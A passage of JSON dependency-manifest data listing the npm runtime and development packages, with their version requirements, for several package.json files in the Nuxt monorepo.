13870348065,"package_name":"nitropack","ecosystem":"npm","requirements":"2.6.3","direct":true,"kind":"development","optional":false},{"id":13870348066,"package_name":"nuxi","ecosystem":"npm","requirements":"3.9.0","direct":true,"kind":"development","optional":false},{"id":13870348067,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"development","optional":false},{"id":13870348068,"package_name":"nuxt-vitest","ecosystem":"npm","requirements":"0.10.5","direct":true,"kind":"development","optional":false},{"id":13870348069,"package_name":"ofetch","ecosystem":"npm","requirements":"1.3.3","direct":true,"kind":"development","optional":false},{"id":13870348070,"package_name":"pathe","ecosystem":"npm","requirements":"1.1.1","direct":true,"kind":"development","optional":false},{"id":13870348071,"package_name":"playwright-core","ecosystem":"npm","requirements":"1.38.0","direct":true,"kind":"development","optional":false},{"id":13870348072,"package_name":"rimraf","ecosystem":"npm","requirements":"5.0.1","direct":true,"kind":"development","optional":false},{"id":13870348073,"package_name":"semver","ecosystem":"npm","requirements":"7.5.4","direct":true,"kind":"development","optional":false},{"id":13870348074,"package_name":"std-env","ecosystem":"npm","requirements":"3.4.3","direct":true,"kind":"development","optional":false},{"id":13870348075,"package_name":"typescript","ecosystem":"npm","requirements":"5.2.2","direct":true,"kind":"development","optional":false},{"id":13870348076,"package_name":"ufo","ecosystem":"npm","requirements":"1.3.0","direct":true,"kind":"development","optional":false},{"id":13870348077,"package_name":"vite","ecosystem":"npm","requirements":"4.4.9","direct":true,"kind":"development","optional":false},{"id":13870348078,"package_name":"vitest","ecosystem":"npm","requirements":"0.33.0","direct":true,"kind":"development","optional":false},{"id":13870348079,"package_name":"vitest-environment-nuxt","ecosystem":"npm","requirements":"0.10.5","direct":true,"kind":"development","optional":false},{"id":13870348080,"package_name":"vue","ecosystem":"npm","requirements":"3.3.4","direct":true,"kind":"development","optional":false},{"id":13870348081,"package_name":"vue-eslint-parser","ecosystem":"npm","requirements":"9.3.1","direct":true,"kind":"development","optional":false},{"id":13870348082,"package_name":"vue-router","ecosystem":"npm","requirements":"4.2.4","direct":true,"kind":"development","optional":false},{"id":13870348083,"package_name":"vue-tsc","ecosystem":"npm","requirements":"1.8.13","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"packages/kit/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:01.294Z","updated_at":"2023-09-22T09:09:01.294Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/packages/kit/package.json","dependencies":[{"id":13870348094,"package_name":"@nuxt/schema","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":13870348095,"package_name":"c12","ecosystem":"npm","requirements":"^1.4.2","direct":true,"kind":"runtime","optional":false},{"id":13870348096,"package_name":"consola","ecosystem":"npm","requirements":"^3.2.3","direct":true,"kind":"runtime","optional":false},{"id":13870348097,"package_name":"defu","ecosystem":"npm","requirements":"^6.1.2","direct":true,"kind":"runtime","optional":false},{"id":13870348098,"package_name":"globby","ecosystem":"npm","requirements":"^13.2.2","direct":true,"kind":"runtime","optional":false},{"id":13870348099,"package_name":"hash-sum","ecosystem":"npm","requirements":"^2.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870348100,"package_name":"ignore","ecosystem":"npm","requirements":"^5.2.4","direct":true,"kind":"runtime","optional":false},{"id":13870348101,"package_name":"jiti","ecosystem":"npm","requirements":"^1.20.0","direct":true,"kind":"runtime","optional":false},{"id":13870348102,"package_name":"knitwork","ecosystem":"npm","requirements":"^1.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870348103,"package_name":"mlly","ecosystem":"npm","requirements":"^1.4.2","direct":true,"kind":"runtime","optional":false},{"id":13870348104,"package_name":"pathe","ecosystem":"npm","requirements":"^1.1.1","direct":true,"kind":"runtime","optional":false},{"id":13870348105,"package_name":"pkg-types","ecosystem":"npm","requirements":"^1.0.3","direct":true,"kind":"runtime","optional":false},{"id":13870348106,"package_name":"scule","ecosystem":"npm","requirements":"^1.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870348107,"package_name":"semver","ecosystem":"npm","requirements":"^7.5.4","direct":true,"kind":"runtime","optional":false},{"id":13870348108,"package_name":"ufo","ecosystem":"npm","requirements":"^1.3.0","direct":true,"kind":"runtime","optional":false},{"id":13870348109,"package_name":"unctx","ecosystem":"npm","requirements":"^2.3.1","direct":true,"kind":"runtime","optional":false},{"id":13870348110,"package_name":"unimport","ecosystem":"npm","requirements":"^3.3.0","direct":true,"kind":"runtime","optional":false},{"id":13870348111,"package_name":"untyped","ecosystem":"npm","requirements":"^1.4.0","direct":true,"kind":"runtime","optional":false},{"id":13870348112,"package_name":"@types/hash-sum","ecosystem":"npm","requirements":"1.0.0","direct":true,"kind":"development","optional":false},{"id":13870348113,"package_name":"@types/lodash-es","ecosystem":"npm","requirements":"4.17.9","direct":true,"kind":"development","optional":false},{"id":13870348114,"package_name":"@types/semver","ecosystem":"npm","requirements":"7.5.2","direct":true,"kind":"development","optional":false},{"id":13870348115,"package_name":"lodash-es","ecosystem":"npm","requirements":"4.17.21","direct":true,"kind":"development","optional":false},{"id":13870348116,"package_name":"nitropack","ecosystem":"npm","requirements":"2.6.3","direct":true,"kind":"development","optional":false},{"id":13870348117,"package_name":"unbuild","ecosystem":"npm","requirements":"latest","direct":true,"kind":"development","optional":false},{"id":13870348118,"package_name":"vite","ecosystem":"npm","requirements":"4.4.9","direct":true,"kind":"development","optional":false},{"id":13870348119,"package_name":"vitest","ecosystem":"npm","requirements":"0.33.0","direct":true,"kind":"development","optional":false},{"id":13870348120,"package_name":"webpack","ecosystem":"npm","requirements":"5.88.2","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"packages/nuxt/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:02.135Z","updated_at":"2023-09-22T09:09:02.135Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/packages/nuxt/package.json","dependencies":[{"id":13870348127,"package_name":"@nuxt/devalue","ecosystem":"npm","requirements":"^2.0.2","direct":true,"kind":"runtime","optional":false},{"id":13870348128,"package_name":"@nuxt/kit","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":13870348129,"package_name":"@nuxt/schema","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":13870348130,"package_name":"@nuxt/telemetry","ecosystem":"npm","requirements":"^2.5.0","direct":true,"kind":"runtime","optional":false},{"id":13870348131,"package_name":"@nuxt/ui-templates","ecosystem":"npm","requirements":"^1.3.1","direct":true,"kind":"runtime","optional":false},{"id":13870348132,"package_name":"@nuxt/vite-builder","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":13870348133,"package_name":"@unhead/dom","ecosystem":"npm","requirements":"^1.7.4","direct":true,"kind":"runtime","optional":false},{"id":13870348134,"package_name":"@unhead/ssr","ecosystem":"npm","requirements":"^1.7.4","direct":true,"kind":"runtime","optional":false},{"id":13870348135,"package_name":"@unhead/vue","ecosystem":"npm","requirements":"^1.7.4","direct":true,"kind":"runtime","optional":false},{"id":13870348136,"package_name":"@vue/shared","ecosystem":"npm","requirements":"^3.3.4","direct":true,"kind":"runtime","optional":false},{"id":13870348137,"package_name":"acorn","ecosystem":"npm","requirements":"8.10.0","direct":true,"kind":"runtime","optional":false},{"id":13870348138,"package_name":"c12","ecosystem":"npm","requirements":"^1.4.2","direct":true,"kind":"runtime","optional":false},{"id":13870348139,"package_name":"chokidar","ecosystem":"npm","requirements":"^3.5.3","direct":true,"kind":"runtime","optional":false},{"id":13870348140,"package_name":"cookie-es","ecosystem":"npm","requirements":"^1.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870348141,"package_name":"defu","ecosystem":"npm","requirements":"^6.1.2","direct":true,"kind":"runtime","optional":false},{"id":13870348142,"package_name":"destr","ecosystem":"npm","requirements":"^2.0.1","direct":true,"kind":"runtime","optional":false},{"id":13870348143,"package_name":"devalue","ecosystem":"npm","requirements":"^4.3.2","direct":true,"kind":"runtime","optional":false},{"id":13870348144,"package_name":"esbuild","ecosystem":"npm","requirements":"^0.19.3","direct":true,"kind":"runtime","optional":false},{"id":13870348145,"package_name":"escape-string-regexp","ecosystem":"npm","requirements":"^5.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870348146,"package_name":"estree-walker","ecosystem":"npm","requirements":"^3.0.3","direct":true,"kind":"runtime","optional":false},{"id":13870348147,"package_name":"fs-extra","ecosystem":"npm","requirements":"^11.1.1","direct":true,"kind":"runtime","optional":false},{"id":13870348148,"package_name":"globby","ecosystem":"npm","requirements":"^13.2.2","direct":true,"kind":"runtime","optional":false},{"id":13870348149,"package_name":"h3","ecosystem":"npm","requirements":"^1.8.1","direct":true,"kind":"runtime","optional":false},{"id":13870348150,"package_name":"hookable","ecosystem":"npm","requirements":"^5.5.3","direct":true,"kind":"runtime","optional":false},{"id":13870348151,"package_name":"jiti","ecosystem":"npm","requirements":"^1.20.0","direct":true,"kind":"runtime","optional":false},{"id":13870348152,"package_name":"klona","ecosystem":"npm","requirements":"^2.0.6","direct":true,"kind":"runtime","optional":false},{"id":13870348153,"package_name":"knitwork","ecosystem":"npm","requirements":"^1.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870348154,"package_name":"magic-string","ecosystem":"npm","requirements":"^0.30.3","direct":true,"kind":"runtime","optional":false},{"id":13870348155,"package_name":"mlly","ecosystem":"npm","requirements":"^1.4.2","direct":true,"kind":"runtime","optional":false},{"id":13870348156,"package_name":"nitropack","ecosystem":"npm","requirements":"^2.6.3","direct":true,"kind":"runtime","optional":false},{"id":13870348157,"package_name":"nuxi","ecosystem":"npm","requirements":"^3.9.0","direct":true,"kind":"runtime","optional":false},{"id":13870348158,"package_name":"nypm","ecosystem":"npm","requirements":"^0.3.3","direct":true,"kind":"runtime","optional":false},{"id":13870348159,"package_name":"ofetch","ecosystem":"npm","requirements":"^1.3.3","direct":true,"kind":"runtime","optional":false},{"id":13870348160,"package_name":"ohash","ecosystem":"npm","requirements":"^1.1.3","direct":true,"kind":"runtime","optional":false},{"id":13870348161,"package_name":"pathe","ecosystem":"npm","requirements":"^1.1.1","direct":true,"kind":"runtime","optional":false},{"id":13870348162,"package_name":"perfect-debounce","ecosystem":"npm","requirements":"^1.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870348163,"package_name":"pkg-types","ecosystem":"npm","requirements":"^1.0.3","direct":true,"kind":"runtime","optional":false},{"id":13870348164,"package_name":"radix3","ecosystem":"npm","requirements":"^1.1.0","direct":true,"kind":"runtime","optional":false},{"id":13870348165,"package_name":"scule","ecosystem":"npm","requirements":"^1.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870348166,"package_name":"std-env","ecosystem":"npm","requirements":"^3.4.3","direct":true,"kind":"runtime","optional":false},{"id":13870348167,"package_name":"strip-literal","ecosystem":"npm","requirements":"^1.3.0","direct":true,"kind":"runtime","optional":false},{"id":13870348168,"package_name":"ufo","ecosystem":"npm","requirements":"^1.3.0","direct":true,"kind":"runtime","optional":false},{"id":13870348169,"package_name":"ultrahtml","ecosystem":"npm","requirements":"^1.5.2","direct":true,"kind":"runtime","optional":false},{"id":13870348170,"package_name":"uncrypto","ecosystem":"npm","requirements":"^0.1.3","direct":true,"kind":"runtime","optional":false},{"id":13870348171,"package_name":"unctx","ecosystem":"npm","requirements":"^2.3.1","direct":true,"kind":"runtime","optional":false},{"id":13870348172,"package_name":"unenv","ecosystem":"npm","requirements":"^1.7.4","direct":true,"kind":"runtime","optional":false},{"id":13870348173,"package_name":"unimport","ecosystem":"npm","requirements":"^3.3.0","direct":true,"kind":"runtime","optional":false},{"id":13870348174,"package_name":"unplugin","ecosystem":"npm","requirements":"^1.5.0","direct":true,"kind":"runtime","optional":false},{"id":13870348175,"package_name":"unplugin-vue-router","ecosystem":"npm","requirements":"^0.6.4","direct":true,"kind":"runtime","optional":false},{"id":13870348176,"package_name":"untyped","ecosystem":"npm","requirements":"^1.4.0","direct":true,"kind":"runtime","optional":false},{"id":13870348177,"package_name":"vue","ecosystem":"npm","requirements":"^3.3.4","direct":true,"kind":"runtime","optional":false},{"id":13870348178,"package_name":"vue-bundle-renderer","ecosystem":"npm","requirements":"^2.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870348179,"package_name":"vue-devtools-stub","ecosystem":"npm","requirements":"^0.1.0","direct":true,"kind":"runtime","optional":false},{"id":13870348180,"package_name":"vue-router","ecosystem":"npm","requirements":"^4.2.4","direct":true,"kind":"runtime","optional":false},{"id":13870348181,"package_name":"@parcel/watcher","ecosystem":"npm","requirements":"2.3.0","direct":true,"kind":"development","optional":false},{"id":13870348182,"package_name":"@types/estree","ecosystem":"npm","requirements":"1.0.1","direct":true,"kind":"development","optional":false},{"id":13870348183,"package_name":"@types/fs-extra","ecosystem":"npm","requirements":"11.0.2","direct":true,"kind":"development","optional":false},{"id":13870348184,"package_name":"@vitejs/plugin-vue","ecosystem":"npm","requirements":"4.3.4","direct":true,"kind":"development","optional":false},{"id":13870348185,"package_name":"unbuild","ecosystem":"npm","requirements":"latest","direct":true,"kind":"development","optional":false},{"id":13870348186,"package_name":"vite","ecosystem":"npm","requirements":"4.4.9","direct":true,"kind":"development","optional":false},{"id":13870348187,"package_name":"vitest","ecosystem":"npm","requirements":"0.33.0","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"packages/schema/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:02.398Z","updated_at":"2023-09-22T09:09:02.398Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/packages/schema/package.json","dependencies":[{"id":13870348191,"package_name":"@nuxt/ui-templates","ecosystem":"npm","requirements":"^1.3.1","direct":true,"kind":"runtime","optional":false},{"id":13870348192,"package_name":"consola","ecosystem":"npm","requirements":"^3.2.3","direct":true,"kind":"runtime","optional":false},{"id":13870348193,"package_name":"defu","ecosystem":"npm","requirements":"^6.1.2","direct":true,"kind":"runtime","optional":false},{"id":13870348194,"package_name":"hookable","ecosystem":"npm","requirements":"^5.5.3","direct":true,"kind":"runtime","optional":false},{"id":13870348195,"package_name":"pathe","ecosystem":"npm","requirements":"^1.1.1","direct":true,"kind":"runtime","optional":false},{"id":13870348196,"package_name":"pkg-types","ecosystem":"npm","requirements":"^1.0.3","direct":true,"kind":"runtime","optional":false},{"id":13870348197,"package_name":"postcss-import-resolver","ecosystem":"npm","requirements":"^2.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870348198,"package_name":"std-env","ecosystem":"npm","requirements":"^3.4.3","direct":true,"kind":"runtime","optional":false},{"id":13870348199,"package_name":"ufo","ecosystem":"npm","requirements":"^1.3.0","direct":true,"kind":"runtime","optional":false},{"id":13870348200,"package_name":"unimport","ecosystem":"npm","requirements":"^3.3.0","direct":true,"kind":"runtime","optional":false},{"id":13870348201,"package_name":"untyped","ecosystem":"npm","requirements":"^1.4.0","direct":true,"kind":"runtime","optional":false},{"id":13870348202,"package_name":"@nuxt/telemetry","ecosystem":"npm","requirements":"2.5.0","direct":true,"kind":"development","optional":false},{"id":13870348203,"package_name":"@types/file-loader","ecosystem":"npm","requirements":"5.0.2","direct":true,"kind":"development","optional":false},{"id":13870348204,"package_name":"@types/pug","ecosystem":"npm","requirements":"2.0.6","direct":true,"kind":"development","optional":false},{"id":13870348205,"package_name":"@types/sass-loader","ecosystem":"npm","requirements":"8.0.5","direct":true,"kind":"development","optional":false},{"id":13870348206,"package_name":"@unhead/schema","ecosystem":"npm","requirements":"1.7.4","direct":true,"kind":"development","optional":false},{"id":13870348207,"package_name":"@vitejs/plugin-vue","ecosystem":"npm","requirements":"4.3.4","direct":true,"kind":"development","optional":false},{"id":13870348208,"package_name":"@vitejs/plugin-vue-jsx","ecosystem":"npm","requirements":"3.0.2","direct":true,"kind":"development","optional":false},{"id":13870348209,"package_name":"@vue/compiler-core","ecosystem":"npm","requirements":"3.3.4","direct":true,"kind":"development","optional":false},{"id":13870348210,"package_name":"esbuild-loader","ecosystem":"npm","requirements":"4.0.2","direct":true,"kind":"development","optional":false},{"id":13870348211,"package_name":"h3","ecosystem":"npm","requirements":"1.8.1","direct":true,"kind":"development","optional":false},{"id":13870348212,"package_name":"ignore","ecosystem":"npm","requirements":"5.2.4","direct":true,"kind":"development","optional":false},{"id":13870348213,"package_name":"nitropack","ecosystem":"npm","requirements":"2.6.3","direct":true,"kind":"development","optional":false},{"id":13870348214,"package_name":"unbuild","ecosystem":"npm","requirements":"latest","direct":true,"kind":"development","optional":false},{"id":13870348215,"package_name":"unctx","ecosystem":"npm","requirements":"2.3.1","direct":true,"kind":"development","optional":false},{"id":13870348216,"package_name":"vite","ecosystem":"npm","requirements":"4.4.9","direct":true,"kind":"development","optional":false},{"id":13870348217,"package_name":"vue","ecosystem":"npm","requirements":"3.3.4","direct":true,"kind":"development","optional":false},{"id":13870348218,"package_name":"vue-bundle-renderer","ecosystem":"npm","requirements":"2.0.0","direct":true,"kind":"development","optional":false},{"id":13870348219,"package_name":"vue-loader","ecosystem":"npm","requirements":"17.2.2","direct":true,"kind":"development","optional":false},{"id":13870348220,"package_name":"vue-router","ecosystem":"npm","requirements":"4.2.4","direct":true,"kind":"development","optional":false},{"id":13870348221,"package_name":"webpack","ecosystem":"npm","requirements":"5.88.2","direct":true,"kind":"development","optional":false},{"id":13870348222,"package_name":"webpack-dev-middleware","ecosystem":"npm","requirements":"6.1.1","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"packages/vite/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:02.894Z","updated_at":"2023-09-22T09:09:02.894Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/packages/vite/package.json","dependencies":[{"id":13870349161,"package_name":"@nuxt/kit","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":13870349162,"package_name":"@rollup/plugin-replace","ecosystem":"npm","requirements":"^5.0.2","direct":true,"kind":"runtime","optional":false},{"id":13870349163,"package_name":"@vitejs/plugin-vue","ecosystem":"npm","requirements":"^4.3.4","direct":true,"kind":"runtime","optional":false},{"id":13870349164,"package_name":"@vitejs/plugin-vue-jsx","ecosystem":"npm","requirements":"^3.0.2","direct":true,"kind":"runtime","optional":false},{"id":13870349165,"package_name":"autoprefixer","ecosystem":"npm","requirements":"^10.4.16","direct":true,"kind":"runtime","optional":false},{"id":13870349166,"package_name":"clear","ecosystem":"npm","requirements":"^0.1.0","direct":true,"kind":"runtime","optional":false},{"id":13870349167,"package_name":"consola","ecosystem":"npm","requirements":"^3.2.3","direct":true,"kind":"runtime","optional":false},{"id":13870349168,"package_name":"cssnano","ecosystem":"npm","requirements":"^6.0.1","direct":true,"kind":"runtime","optional":false},{"id":13870349169,"package_name":"defu","ecosystem":"npm","requirements":"^6.1.2","direct":true,"kind":"runtime","optional":false},{"id":13870349170,"package_name":"esbuild","ecosystem":"npm","requirements":"^0.19.3","direct":true,"kind":"runtime","optional":false},{"id":13870349171,"package_name":"escape-string-regexp","ecosystem":"npm","requirements":"^5.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870349172,"package_name":"estree-walker","ecosystem":"npm","requirements":"^3.0.3","direct":true,"kind":"runtime","optional":false},{"id":13870349173,"package_name":"externality","ecosystem":"npm","requirements":"^1.0.2","direct":true,"kind":"runtime","optional":false},{"id":13870349174,"package_name":"fs-extra","ecosystem":"npm","requirements":"^11.1.1","direct":true,"kind":"runtime","optional":false},{"id":13870349175,"package_name":"get-port-please","ecosystem":"npm","requirements":"^3.1.1","direct":true,"kind":"runtime","optional":false},{"id":13870349176,"package_name":"h3","ecosystem":"npm","requirements":"^1.8.1","direct":true,"kind":"runtime","optional":false},{"id":13870349177,"package_name":"knitwork","ecosystem":"npm","requirements":"^1.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870349178,"package_name":"magic-string","ecosystem":"npm","requirements":"^0.30.3","direct":true,"kind":"runtime","optional":false},{"id":13870349179,"package_name":"mlly","ecosystem":"npm","requirements":"^1.4.2","direct":true,"kind":"runtime","optional":false},{"id":13870349180,"package_name":"ohash","ecosystem":"npm","requirements":"^1.1.3","direct":true,"kind":"runtime","optional":false},{"id":13870349181,"package_name":"pathe","ecosystem":"npm","requirements":"^1.1.1","direct":true,"kind":"runtime","optional":false},{"id":13870349182,"package_name":"perfect-debounce","ecosystem":"npm","requirements":"^1.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870349183,"package_name":"pkg-types","ecosystem":"npm","requirements":"^1.0.3","direct":true,"kind":"runtime","optional":false},{"id":13870349184,"package_name":"postcss","ecosystem":"npm","requirements":"^8.4.30","direct":true,"kind":"runtime","optional":false},{"id":13870349185,"package_name":"postcss-import","ecosystem":"npm","requirements":"^15.1.0","direct":true,"kind":"runtime","optional":false},{"id":13870349186,"package_name":"postcss-url","ecosystem":"npm","requirements":"^10.1.3","direct":true,"kind":"runtime","optional":false},{"id":13870349187,"package_name":"rollup-plugin-visualizer","ecosystem":"npm","requirements":"^5.9.2","direct":true,"kind":"runtime","optional":false},{"id":13870349188,"package_name":"std-env","ecosystem":"npm","requirements":"^3.4.3","direct":true,"kind":"runtime","optional":false},{"id":13870349189,"package_name":"strip-literal","ecosystem":"npm","requirements":"^1.3.0","direct":true,"kind":"runtime","optional":false},{"id":13870349190,"package_name":"ufo","ecosystem":"npm","requirements":"^1.3.0","direct":true,"kind":"runtime","optional":false},{"id":13870349191,"package_name":"unplugin","ecosystem":"npm","requirements":"^1.5.0","direct":true,"kind":"runtime","optional":false},{"id":13870349192,"package_name":"vite","ecosystem":"npm","requirements":"^4.4.9","direct":true,"kind":"runtime","optional":false},{"id":13870349193,"package_name":"vite-node","ecosystem":"npm","requirements":"^0.33.0","direct":true,"kind":"runtime","optional":false},{"id":13870349194,"package_name":"vite-plugin-checker","ecosystem":"npm","requirements":"^0.6.2","direct":true,"kind":"runtime","optional":false},{"id":13870349195,"package_name":"vue-bundle-renderer","ecosystem":"npm","requirements":"^2.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870349196,"package_name":"@nuxt/schema","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"development","optional":false},{"id":13870349197,"package_name":"@types/clear","ecosystem":"npm","requirements":"0.1.2","direct":true,"kind":"development","optional":false},{"id":13870349198,"package_name":"@types/estree","ecosystem":"npm","requirements":"1.0.1","direct":true,"kind":"development","optional":false},{"id":13870349199,"package_name":"@types/fs-extra","ecosystem":"npm","requirements":"11.0.2","direct":true,"kind":"development","optional":false},{"id":13870349200,"package_name":"unbuild","ecosystem":"npm","requirements":"latest","direct":true,"kind":"development","optional":false},{"id":13870349201,"package_name":"vue","ecosystem":"npm","requirements":"3.3.4","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"packages/webpack/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:03.694Z","updated_at":"2023-09-22T09:09:03.694Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/packages/webpack/package.json","dependencies":[{"id":13870349216,"package_name":"@nuxt/friendly-errors-webpack-plugin","ecosystem":"npm","requirements":"^2.5.2","direct":true,"kind":"runtime","optional":false},{"id":13870349217,"package_name":"@nuxt/kit","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":13870349218,"package_name":"autoprefixer","ecosystem":"npm","requirements":"^10.4.16","direct":true,"kind":"runtime","optional":false},{"id":13870349219,"package_name":"css-loader","ecosystem":"npm","requirements":"^6.8.1","direct":true,"kind":"runtime","optional":false},{"id":13870349220,"package_name":"css-minimizer-webpack-plugin","ecosystem":"npm","requirements":"^5.0.1","direct":true,"kind":"runtime","optional":false},{"id":13870349221,"package_name":"cssnano","ecosystem":"npm","requirements":"^6.0.1","direct":true,"kind":"runtime","optional":false},{"id":13870349222,"package_name":"defu","ecosystem":"npm","requirements":"^6.1.2","direct":true,"kind":"runtime","optional":false},{"id":13870349223,"package_name":"esbuild-loader","ecosystem":"npm","requirements":"^4.0.2","direct":true,"kind":"runtime","optional":false},{"id":13870349224,"package_name":"escape-string-regexp","ecosystem":"npm","requirements":"^5.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870349225,"package_name":"estree-walker","ecosystem":"npm","requirements":"^3.0.3","direct":true,"kind":"runtime","optional":false},{"id":13870349226,"package_name":"file-loader","ecosystem":"npm","requirements":"^6.2.0","direct":true,"kind":"runtime","optional":false},{"id":13870349227,"package_name":"fork-ts-checker-webpack-plugin","ecosystem":"npm","requirements":"^8.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870349228,"package_name":"fs-extra","ecosystem":"npm","requirements":"^11.1.1","direct":true,"kind":"runtime","optional":false},{"id":13870349229,"package_name":"h3","ecosystem":"npm","requirements":"^1.8.1","direct":true,"kind":"runtime","optional":false},{"id":13870349230,"package_name":"hash-sum","ecosystem":"npm","requirements":"^2.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870349231,"package_name":"lodash-es","ecosystem":"npm","requirements":"^4.17.21","direct":true,"kind":"runtime","optional":false},{"id":13870349232,"package_name":"magic-string","ecosystem":"npm","requirements":"^0.30.3","direct":true,"kind":"runtime","optional":false},{"id":13870349233,"package_name":"memfs","ecosystem":"npm","requirements":"^4.3.0","direct":true,"kind":"runtime","optional":false},{"id":13870349234,"package_name":"mini-css-extract-plugin","ecosystem":"npm","requirements":"^2.7.6","direct":true,"kind":"runtime","optional":false},{"id":13870349235,"package_name":"mlly","ecosystem":"npm","requirements":"^1.4.2","direct":true,"kind":"runtime","optional":false},{"id":13870349236,"package_name":"ohash","ecosystem":"npm","requirements":"^1.1.3","direct":true,"kind":"runtime","optional":false},{"id":13870349237,"package_name":"pathe","ecosystem":"npm","requirements":"^1.1.1","direct":true,"kind":"runtime","optional":false},{"id":13870349238,"package_name":"pify","ecosystem":"npm","requirements":"^6.1.0","direct":true,"kind":"runtime","optional":false},{"id":13870349239,"package_name":"postcss","ecosystem":"npm","requirements":"^8.4.30","direct":true,"kind":"runtime","optional":false},{"id":13870349240,"package_name":"postcss-import","ecosystem":"npm","requirements":"^15.1.0","direct":true,"kind":"runtime","optional":false},{"id":13870349241,"package_name":"postcss-loader","ecosystem":"npm","requirements":"^7.3.3","direct":true,"kind":"runtime","optional":false},{"id":13870349242,"package_name":"postcss-url","ecosystem":"npm","requirements":"^10.1.3","direct":true,"kind":"runtime","optional":false},{"id":13870349243,"package_name":"pug-plain-loader","ecosystem":"npm","requirements":"^1.1.0","direct":true,"kind":"runtime","optional":false},{"id":13870349244,"package_name":"std-env","ecosystem":"npm","requirements":"^3.4.3","direct":true,"kind":"runtime","optional":false},{"id":13870349245,"package_name":"time-fix-plugin","ecosystem":"npm","requirements":"^2.0.7","direct":true,"kind":"runtime","optional":false},{"id":13870349246,"package_name":"ufo","ecosystem":"npm","requirements":"^1.3.0","direct":true,"kind":"runtime","optional":false},{"id":13870349247,"package_name":"unplugin","ecosystem":"npm","requirements":"^1.5.0","direct":true,"kind":"runtime","optional":false},{"id":13870349248,"package_name":"url-loader","ecosystem":"npm","requirements":"^4.1.1","direct":true,"kind":"runtime","optional":false},{"id":13870349249,"package_name":"vue-bundle-renderer","ecosystem":"npm","requirements":"^2.0.0","direct":true,"kind":"runtime","optional":false},{"id":13870349250,"package_name":"vue-loader","ecosystem":"npm","requirements":"^17.2.2","direct":true,"kind":"runtime","optional":false},{"id":13870349251,"package_name":"webpack","ecosystem":"npm","requirements":"^5.88.2","direct":true,"kind":"runtime","optional":false},{"id":13870349252,"package_name":"webpack-bundle-analyzer","ecosystem":"npm","requirements":"^4.9.1","direct":true,"kind":"runtime","optional":false},{"id":13870349253,"package_name":"webpack-dev-middleware","ecosystem":"npm","requirements":"^6.1.1","direct":true,"kind":"runtime","optional":false},{"id":13870349254,"package_name":"webpack-hot-middleware","ecosystem":"npm","requirements":"^2.25.4","direct":true,"kind":"runtime","optional":false},{"id":13870349255,"package_name":"webpack-virtual-modules","ecosystem":"npm","requirements":"^0.5.0","direct":true,"kind":"runtime","optional":false},{"id":13870349256,"package_name":"webpackbar","ecosystem":"npm","requirements":"^5.0.2","direct":true,"kind":"runtime","optional":false},{"id":13870349257,"package_name":"@nuxt/schema","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"development","optional":false},{"id":13870349258,"package_name":"@types/fs-extra","ecosystem":"npm","requirements":"11.0.2","direct":true,"kind":"development","optional":false},{"id":13870349259,"package_name":"@types/hash-sum","ecosystem":"npm","requirements":"1.0.0","direct":true,"kind":"development","optional":false},{"id":13870349260,"package_name":"@types/lodash-es","ecosystem":"npm","requirements":"4.17.9","direct":true,"kind":"development","optional":false},{"id":13870349261,"package_name":"@types/pify","ecosystem":"npm","requirements":"5.0.1","direct":true,"kind":"development","optional":false},{"id":13870349262,"package_name":"@types/webpack-bundle-analyzer","ecosystem":"npm","requirements":"4.6.0","direct":true,"kind":"development","optional":false},{"id":13870349263,"package_name":"@types/webpack-hot-middleware","ecosystem":"npm","requirements":"2.25.6","direct":true,"kind":"development","optional":false},{"id":13870349264,"package_name":"@types/webpack-virtual-modules","ecosystem":"npm","requirements":"0.1.1","direct":true,"kind":"development","optional":false},{"id":13870349265,"package_name":"unbuild","ecosystem":"npm","requirements":"latest","direct":true,"kind":"development","optional":false},{"id":13870349266,"package_name":"vue","ecosystem":"npm","requirements":"3.3.4","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"playground/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:04.361Z","updated_at":"2023-09-22T09:09:04.361Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/playground/package.json","dependencies":[{"id":13870349271,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":fal